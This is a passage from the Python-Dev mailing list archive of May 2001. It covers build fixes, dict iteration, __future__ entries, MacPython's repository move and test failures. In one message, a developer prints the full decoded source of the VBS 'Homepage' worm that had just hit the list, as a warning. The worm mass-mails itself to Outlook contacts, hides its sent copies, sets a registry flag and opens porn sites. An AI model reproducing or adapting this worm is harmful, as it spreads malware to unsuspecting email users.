From guido@digicool.com Tue May 8 14:35:50 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:35:50 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400." References: Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com> > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes be made non-optional on the trunk? [Tim] > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're > having trouble sleeping tonight . +1. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Tue May 8 14:41:42 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:41:42 -0500 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800." <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com> > A change to termios.c in the last couple of days to #include termio.h as > well as termios.h breaks the build on FreeBSD, which has only termios.h - > needs an autoconf test? There'll probably be other similar systems. Frankly, I don't see the point of including termio.h at all -- it seems to be a backwards compatibility file. Mark, can you please enter this in the bug database and assign it to whoever checked in the change?
:-) --Guido van Rossum (home page: http://www.python.org/~guido/) From nas@python.ca Tue May 8 15:05:01 2001 From: nas@python.ca (Neil Schemenauer) Date: Tue, 8 May 2001 07:05:01 -0700 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: ; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400 References: Message-ID: <20010508070501.A25794@glacier.fnational.com> Tim Peters wrote: > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes be made non-optional on the trunk? > > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're > having trouble sleeping tonight . Shouldn't the entry in the __future__ file be: nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0)) or am I misunderstanding something? Neil From jack@oratrix.nl Tue May 8 15:07:39 2001 From: jack@oratrix.nl (Jack Jansen) Date: Tue, 08 May 2001 16:07:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Thomas Wouters , Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl> Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl> > I'd say merge, except that the number '1000' is very large. Is it really > 1000 ? The current Python tree contains only 304 .c and .h files, about 1000 > .py files spread out over the tree (567 of which in Lib, the rest in > Demo/Tools) and obviously some misc files and CVS stuff, for a total of > around 2500 files. Is that 1000 a real number ? No temp files, > auto-generated files, .o files etc ? How large are they ? (the average size > in the current CVS tree is about 10k) It's actually 830 files. This is 320 .py files (130 in Lib, the rest in Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build system), 30 resource files and then assorted things (html documentation, scripts to drive the distribution builder, etc).
The .xml and .exp files and about 20 of the .c files are machine generated, so they could technically be left out of the repository. The generation process of these files is a bit painful, though, so I've added them as a convenience (the reasoning is a bit along the lines of the Grammar stuff of the core). The one thing that I should do is clean out the "Unsupported" directory before doing the merge. It contains some stuff that is long dead. But then, it isn't all that many files. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From mwh@python.net Tue May 8 15:41:45 2001 From: mwh@python.net (Michael Hudson) Date: Tue, 8 May 2001 15:41:45 +0100 (BST) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: Guido van Rossum writes: > > A change to termios.c in the last couple of days to #include termio.h > > as well as termios.h breaks the build on FreeBSD, which has only > > termios.h - needs an autoconf test? There'll probably be other similar > > systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. If you don't include termio.h the build breaks on alpha/OSF1. This sounds to me like OSF1's headers are broken (you can't include sys/ioctl.h without including termio.h first, it seems, or you get complaints about struct termio being undefined). So I'd suggest

    +#ifdef __osf__
     #include
    +#endif

and then see if the build breaks anywhere else (I love unix). Using the sf compile farm, I've tested this on FreeBSD, Linux/x86, Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives a pile of warnings from redefined macros and then dies 'cause it can't find a valid license file). So we might need some more magic for solaris using cc. Cheers, M.
-- Imagine if every Thursday your shoes exploded if you tied them the usual way. This happens to us all the time with computers, and nobody thinks of complaining. -- Jeff Raskin From fdrake@acm.org Tue May 8 15:45:18 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Tue, 8 May 2001 10:45:18 -0400 (EDT) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: References: Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Michael Hudson writes: > If you don't include termio.h the build breaks on alpha/OSF1. This > sounds to me like OSF1's headers are broken (you can't include > sys/ioctl.h without including termio.h first, it seems, or you get > complaints about struct termio being undefined). So I'd suggest > > +#ifdef __osf__ > #include > +#endif > > and then see if the build breaks anywhere else (I love unix). Does it make more sense to do this or to test for termio.h in configure? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From m.favas@per.dem.csiro.au Tue May 8 15:47:39 2001 From: m.favas@per.dem.csiro.au (Mark Favas) Date: Tue, 08 May 2001 22:47:39 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com> Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au> Guido van Rossum wrote: > > > A change to termios.c in the last couple of days to #include termio.h as > > well as termios.h breaks the build on FreeBSD, which has only termios.h - > > needs an autoconf test? There'll probably be other similar systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. > > Mark, can you please enter this in the bug database and assign it to > whoever checked in the change? 
:-) Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred Drake -- Mark Favas - m.favas@per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From thomas@xs4all.net Tue May 8 16:52:49 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 17:52:49 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200 References: <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <20010508175248.E16486@xs4all.nl> On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote: [ Jack wants to add the +/- 1000 extra files from the MacPython source tree to the Python CVS repository ] > It's actually 830 files. This is 320 .py files (130 in Lib, the rest in > Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build > system), 30 resource files and then assorted things (html documentation, > scripts to drive the distribution builder, etc). I'd say merge it. If there had been decent CVS clients for the mac when you started, those files would have been in the CVS tree already. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From skip@pobox.com (Skip Montanaro) Tue May 8 19:22:17 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Tue, 8 May 2001 13:22:17 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl> References: <20010508141000.A16486@xs4all.nl> <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <15096.14681.773554.729550@beluga.mojam.com> Jack> It's actually 830 files. ... 120 .c/.h files ... How many of those 120 files are variants of existing source files that (in theory) could be merged with their mainline counterparts? 
Skip From mwh@python.net Tue May 8 23:27:59 2001 From: mwh@python.net (Michael Hudson) Date: 08 May 2001 23:27:59 +0100 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)" References: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > If you don't include termio.h the build breaks on alpha/OSF1. This > > sounds to me like OSF1's headers are broken (you can't include > > sys/ioctl.h without including termio.h first, it seems, or you get > > complaints about struct termio being undefined). So I'd suggest > > > > +#ifdef __osf__ > > #include > > +#endif > > > > and then see if the build breaks anywhere else (I love unix). > > Does it make more sense to do this or to test for termio.h in > configure? If you're asking *me*, I have no idea. I'd hope that no system would be as broken as osf1 is in this regard, but then I'd have hoped that osf1 wasn't this broken too... I guess the test in configure is "safer" in some sense. Getting this perfectly right would probably require more autoconf hackery than one can possibly imagine... ncurses generates an amk script from ./configure that is then run to produce term.h, but I'm not sure that all of that is devoted to including the right headers. can-we-just-have-TERMIOS-back?-ly y'rs M. -- Good? Bad? Strap him into the IETF-approved witch-dunking apparatus immediately! -- NTK now, 21/07/2000 From mark@per.dem.csiro.au Wed May 9 01:53:01 2001 From: mark@per.dem.csiro.au (Mark Favas) Date: Wed, 9 May 101 13:52:09 +0800 (WST) Subject: [Python-Dev] gcc barfs on recent stringobject changes... Message-ID: <200105090552.NAA08038@erebus.per.dem.csiro.au> Changes in the last few hours (hi Tim!) 
to stringobject compile (I'd guess) on MS (and on Compaq's Tru64 compiler), but produce the following with gcc on Solaris and FreeBSD:

gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include -DHAVE_CONFIG_H -o Objects/stringobject.o Objects/stringobject.c
Objects/stringobject.c: In function `PyString_FromStringAndSize':
Objects/stringobject.c:76: invalid lvalue in unary `&'
Objects/stringobject.c:80: invalid lvalue in unary `&'
Objects/stringobject.c: In function `PyString_FromString':
Objects/stringobject.c:130: invalid lvalue in unary `&'
Objects/stringobject.c:134: invalid lvalue in unary `&'
*** Error code 1

-- Email - m.favas@per.dem.csiro.au Postal - Mark C Favas Phone - +61 8 9333 6268, 041 892 6074 CSIRO Exploration & Mining Fax - +61 8 9387 8642 Private Bag No 5 Wembley, Western Australia 6913

From tim.one@home.com Wed May 9 07:48:12 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 02:48:12 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: <20010508133638.Z16486@xs4all.nl> Message-ID:

[Tim]
> Given the new dict iterators in 2.2, there's an easier fast way
> that doesn't mutate the dict even under the covers:
>
>     def arb(dict):
>         if dict:
>             return dict.iteritems().next()
>         raise KeyError("arb passed an empty dict")

[Thomas Wouters]
> You probably want:
>
>     arb = dict.iteritems().next
>
> so that you don't keep on returning the same key,value pair.

No, I would not want that. If "arbitrary" suffices, then by defn. *any* element is "good enough". If it's not good enough to get the same one back every time, then I want a stronger guarantee about what arb() returns than the inexplicable behavior of repeated calls to dict.iteritems().next in the presence of dict mutation.
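To make the contrast between Tim's `arb()` and Thomas's bound-iterator variant concrete, here is a minimal sketch in present-day Python 3, assuming `next(iter(d.items()))` as the stand-in for the 2.2-era `dict.iteritems().next()`. The name `arb` comes from the thread; everything else is illustrative. Note that modern CPython raises `RuntimeError` when a dict changes size under a live iterator, rather than silently skipping or repeating entries as Tim describes for 2.2.

```python
def arb(d):
    """Return an arbitrary (key, value) pair from d without mutating it."""
    if d:
        # A fresh iterator on every call, so no state survives between calls.
        return next(iter(d.items()))
    raise KeyError("arb passed an empty dict")


d = {"a": 1, "b": 2, "c": 3}
first = arb(d)
assert arb(d) == first   # same pair again while d is unchanged
assert len(d) == 3       # arb() removed nothing

# Thomas's variant binds ONE iterator and reuses it, so successive calls
# walk through the dict instead of repeating the same pair.
step = iter(d.items()).__next__
assert step() != step()

# Mutating the dict's size invalidates a live iterator in modern CPython.
step = iter(d.items()).__next__
step()
d["z"] = 26
try:
    step()
except RuntimeError as exc:
    print("iterator invalidated:", exc)

# popitem() removes what it returns, which is easy to reason about under mutation.
k, v = d.popitem()
assert k not in d
```

The fresh-iterator-per-call design is what gives `arb()` its "same answer until the dict changes" behaviour. The bound `__next__` trades that for a traversal whose meaning depends on whether the dict is mutated in between.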
But as I've said several times before, I'm still asking for an algorithm where arb() is actually useful (as opposed to .popitem(), which is dead easy to explain in the presence of mutation; your version of arb() can, e.g., return a given entry more than once, may skip entries, and may raise StopIteration with unexamined entries remaining in the dict).

not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly y'rs - tim

From tim.one@home.com Wed May 9 08:42:00 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 03:42:00 -0400 Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au> Message-ID:

[Mark Favas]
> Changes in the last few hours (hi Tim!)

Hi Mark! Sorry about that!

> to stringobject compile (I'd guess) on MS

You guess right -- and under two flavors of Windows.

> (and on Compaq's Tru64 compiler),

Figures.

> but produce the following with gcc on Solaris and FreeBSD:
>
> gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include
> -DHAVE_CONFIG_H -o Objects/stringobject.o Objects/stringobject.c
> Objects/stringobject.c: In function `PyString_FromStringAndSize':
> Objects/stringobject.c:76: invalid lvalue in unary `&'
> Objects/stringobject.c:80: invalid lvalue in unary `&'
> Objects/stringobject.c: In function `PyString_FromString':
> Objects/stringobject.c:130: invalid lvalue in unary `&'
> Objects/stringobject.c:134: invalid lvalue in unary `&'
> *** Error code 1

Fair enough: I tried to use a cast as an lvalue in those 4 places, all of the form:

    PyString_InternInPlace(&(PyObject *)op);

where op is declared PyStringObject*. Strictly speaking, that ain't legal, but changing it to:

    PyObject *t = (PyObject *)op;
    PyString_InternInPlace(&t);

is. You may wonder WTF the difference is. That's easy: the rewrite doesn't use a cast expression as an lvalue.
sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs - tim From jack@oratrix.nl Wed May 9 09:16:29 2001 From: jack@oratrix.nl (Jack Jansen) Date: Wed, 09 May 2001 10:16:29 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by , Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com> Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl> > > Jack> It's actually 830 files. ... 120 .c/.h files ... > > How many of those 120 files are variants of existing source files that (in > theory) could be merged with their mainline counterparts? None (unless you would count macmodule.c as a variant of posixmodule.c). I think macmain.c started out as a clone of pythonmain.c, but I think they're too different to merge (but I'll have a look). Hmm, now that I think of it macmodule and posixmodule could possibly be merged. It's fun to see how much statistics I gather about MacPython in just a few days:-) -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From tim.one@home.com Wed May 9 09:20:12 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 04:20:12 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: <20010508070501.A25794@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Shouldn't the entry in the __future__ file be: > > nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0)) > > or am I misunderstanding something? Until nested_scopes *is* the rule, the Mandatory Release field is just a guess about the future. Changing it to (2, 2, 0, "alpha", 0) right *now* would be wrong, since it would change it from a guess about the future to a false statement about the present. 
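The Optional and Mandatory Release fields Neil and Tim are discussing can be inspected directly from the `__future__` module. The sketch below assumes a current CPython, whose `__future__.nested_scopes` record carries the values Neil proposed. In the tree under discussion the mandatory field was still, in Tim's words, a guess about the future.

```python
import sys
import __future__

feature = __future__.nested_scopes

optional = feature.getOptionalRelease()    # first release accepting the future import
mandatory = feature.getMandatoryRelease()  # release where it became the default

print("optional: ", optional)
print("mandatory:", mandatory)

# Release tuples have the same shape as sys.version_info, so plain tuple
# comparison tells whether the running interpreter has the feature unconditionally.
if sys.version_info >= mandatory:
    print("nested_scopes is always on in this interpreter")
```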
It must be changed when nested_scopes become mandatory; it needn't be changed before then (unless we delay making them mandatory beyond 2.2 final), although if somebody thinks they have a good use for moving the guess up, fine, just so long as they don't move the guess to or before 2.2a0.

From thomas@xs4all.net Wed May 9 09:58:50 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 10:58:50 +0200 Subject: [Python-Dev] Crashes w/ CVS tree Message-ID: <20010509105850.F16486@xs4all.nl>

I'm getting a crash with Python compiled from a freshly updated CVS tree, even when running just './python'. It crashes during the loading of os.pyc. It doesn't crash if I start python with -S, and it doesn't crash if I remove *.pyc first:

centurion:~/python/python-2.2/dist/src/linux> ./python
Python 2.2a0 (#4, May 9 2001, 09:52:29)
[GCC 2.95.4 20010506 (Debian prerelease)] on linux2
Type "copyright", "credits" or "license" for more information.
>>>
centurion:~/python/python-2.2/dist/src/linux> ./python
Segmentation fault

If I remove os.pyc only, I get the enlightning:

Fatal Python error: PyString_InternInPlace: strings only please!
Abort (core dumped)

I would blame Tim, except that when examining the corefile I found some pointers to other causes. The 'original' crash occurs because cmp_outcome() is passed an invalid PyObject, with most of its function slots pointing to the middle of the glibc-internal '__morecore()' function. Examining the stack off of which the invalid item was popped reveals that the next-to-last item is an iterator. So maybe I should blame Guido instead, either for the iterator or for rich comparisons ;)

From what I can tell, the segfault happens in os.py, here:

    import posixpath
    path = posixpath
    del posixpath
    import posix
    __all__.extend(_get_exports_list(posix))
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    del posix
elif 'nt' in _names:

That is, after importing posix, while getting the exports lists.
Which, in the case of posixmodule, uses a list comprehension.... which now uses an iterator... so maybe it's Tim after all. :-) Unfortunately, I don't have time to look at it right now (meetings, meetings.) If noone is looking at it by the time I'm back and free, I'll hunt some more ;) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas@xs4all.net Wed May 9 10:14:32 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 11:14:32 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112 In-Reply-To: ; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700 References: <20010509105850.F16486@xs4all.nl> Message-ID: <20010509111432.G16486@xs4all.nl> On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Objects > In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects > > Modified Files: > stringobject.c > Log Message: > Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to > restore correct semantics. This apparently fixed my problem: On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote: > > I'm getting a crash with Python compiled from a freshly updated CVS tree, > even when running just './python'. It crashes during the loading of os.pyc. > It doesn't crash if I start python with -S, and it doesn't crash if I remove > *.pyc first: That ought to teach me to spend my morning doing something fun -- it turned out to be useless :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! 
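Thomas's crash report points at the `_get_exports_list(posix)` call that `os.py` uses to extend `os.__all__`. The helper's body is not quoted in the thread. The sketch below is a reconstruction that assumes it prefers a module's own `__all__` and otherwise falls back to the module's public (non-underscore) names, which matches how current `os.py` behaves. The name `exports_list` is hypothetical and chosen so as not to imply this is the 2001 stdlib code; the fake module stands in for the real `posix` extension.

```python
import types


def exports_list(module):
    """Names a wrapper module like os would re-export from `module`."""
    try:
        # Respect an explicit public API if the module declares one.
        return list(module.__all__)
    except AttributeError:
        # Otherwise treat every name without a leading underscore as public.
        # (In 2.2 this list comprehension ran on the new iterator machinery.)
        return [name for name in dir(module) if not name.startswith("_")]


# Demo with a throwaway module object instead of the real posix module.
fake = types.ModuleType("fake_posix")
fake.getcwd = lambda: "/"
fake._private_helper = None

exports = ["path"]
exports.extend(exports_list(fake))
print(exports)
```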
From tim.one@home.com Wed May 9 10:29:31 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 05:29:31 -0400 Subject: [Python-Dev] Crashes w/ CVS tree In-Reply-To: <20010509105850.F16486@xs4all.nl> Message-ID: [Thomas Wouters] > I'm getting a crash with Python compiled from a freshly updated CVS > tree,even when running just './python'. I did too, for a little while, but it's gone away. > ... > Fatal Python error: PyString_InternInPlace: strings only please! > Abort (core dumped) > > I would blame Tim, I would too. Please update, and if stringobject.c changes, try again. I'm sure this is my fault, but I'm too sleepy to figure out why, and I did change *something* at random that appeared to make it go away. it's-all-gcc's-fault-ly y'rs - tim From Greg.Wilson@baltimore.com Wed May 9 16:49:29 2001 From: Greg.Wilson@baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 11:49:29 -0400 Subject: [Python-Dev] Homepage Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Hi! You've got to see this page! It's really cool ;O) From guido@digicool.com Wed May 9 18:08:22 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 12:08:22 -0500 Subject: [Python-Dev] Homepage In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400." <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Greg Wilson's computer was infected by a virus which got propagated to python-dev.
Do NOT open the attachment! --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik@pythonware.com Wed May 9 17:12:00 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Wed, 9 May 2001 18:12:00 +0200 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid> Greg's mail program wrote: > Hi! > > You've got to see this page! It's really cool ;O) > Content-Type: application/octet-stream; > name="homepage.HTML.vbs" > Content-Transfer-Encoding: quoted-printable > Content-Disposition: attachment; > filename="homepage.HTML.vbs" when will we see the first "homepage.HTML.py" virus? Cheers /F From esr@thyrsus.com Wed May 9 17:20:24 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 9 May 2001 12:20:24 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500 References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <20010509122024.A416@thyrsus.com> Guido van Rossum : > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Some of us -- heh, heh -- aren't vulnerable to attachment trojans. I could almost (not quite, but almost) love the crackers and script kiddiez of the world for what they're doing to Microsoft... -- Eric S. Raymond We shall not cease from exploration, and the end of all our exploring will be to arrive where we started and know the place for the first time. -- T.S. 
Eliot From fdrake@cj42289-a.reston1.va.home.com Wed May 9 17:21:27 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:21:27 -0400 (EDT) Subject: [Python-Dev] [maintenance doc updates] Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/maint-docs/ Incremental update of the maintenance branch (for Python 2.1.1). From barry@digicool.com Wed May 9 17:23:26 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 9 May 2001 12:23:26 -0400 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <15097.28414.354061.170478@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Greg Wilson's computer was infected by a virus which got GvR> propagated to python-dev. Do NOT open the attachment! Darn, and I was just finishing up the vbs.el script so my XEmacs/VM reader could open it. share-the-pain-share-the-fun-ly y'rs, -Barry From fdrake@cj42289-a.reston1.va.home.com Wed May 9 17:47:27 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:47:27 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update of the development branch (for Python 2.2). From Samuele Pedroni Wed May 9 18:12:20 2001 From: Samuele Pedroni (Samuele Pedroni) Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST) Subject: [Python-Dev] Homepage Message-ID: <200105091712.TAA05172@core.inf.ethz.ch> Hi. [GvR] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! 
Here's the beast ("decrypted" and in a cage): ("decrypted" and in a cage): (we got it also on the old jpython-interest) MS has really increased computer usability, when I was younger (and I'm not that old) one bad guy had to use assembler to cause some damage, now thanks to MS, that don't cares much about security but likely a lot about self-confindence, everybody can feel very clever and proud writing such things ... and spamming the whole internet. On Error Resume Next Set WS = CreateObject("WScript.Shell") Set FSO= Createobject("scripting.filesystemobject") Folder=FSO.GetSpecialFolder(2) Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1) Do While InF.AtEndOfStream<>True ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf Loop Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true) OutF.write ScriptBuffer OutF.close Set FSO=Nothing If WS.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If Set s=CreateObject("Outlook.Application") Set t=s.GetNameSpace("MAPI") Set u=t.GetDefaultFolder(6) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).close u.Items.Item(i).delete End If Next Set u=t.GetDefaultFolder(3) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).delete End If Next Randomize r=Int((4*Rnd)+1) If r=1 then WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm") elseif r=2 Then WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm") elseif r=3 Then WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm") ElseIf r=4 Then WS.Run("http://sheila.issexy.tv/1.htm") End If Function Mailit() On Error Resume Next Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Mapi=Outlook.GetNameSpace("MAPI") Set Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount Set Mail = Outlook.CreateItem(0) Set Contact = ListIndex.AddressEntries(Count) Mail.To = 
Contact.Address Mail.Subject = "Homepage" Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf Set Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.HTML.vb$" Mail.DeleteAfterSubmit = True If Mail.To <> "" Then Mail.Send WS.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function PS: the "decryption" was done in python ;) From tim.one@home.com Wed May 9 18:47:22 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 13:47:22 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Note that the same virus went out under the name of John G. Michopoulos on the JPython (not Jython!) mailing list. Here's detailed info on the virus (incl. simple removal instructions if you got bit): http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d@mm.html Doesn't appear to be worse than a nuisance. Anyone who has used Windows Update within the last year and installed the "critical updates" it recommends should have gotten a popup box warning that the attachment was trying to access the Address Book, telling you it's probably a virus, and advising to accept the "No, don't allow this" default. you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs - tim From Greg.Wilson@baltimore.com Wed May 9 19:50:25 2001 From: Greg.Wilson@baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 14:50:25 -0400 Subject: [Python-Dev] apology Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com> My apologies to all --- yes, my machine was hit by a virus that flooded the known universe with email. 
Sorry for any grief it has caused anyone, Greg From tim.one@home.com Wed May 9 20:30:41 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 15:30:41 -0400 Subject: [Python-Dev] test_urllib2 fails on Win98SE Message-ID: test_urliib2 takes > 30 seconds, then fails: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ? f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file if not host or \ socket.error: host not found The URL it's passing is file://c:\code\python\dist\src\lib\urllib2.pyc If I change test_urllib2's file_url = "file://%s" % urllib2.__file__ to (adding another slash) file_url = 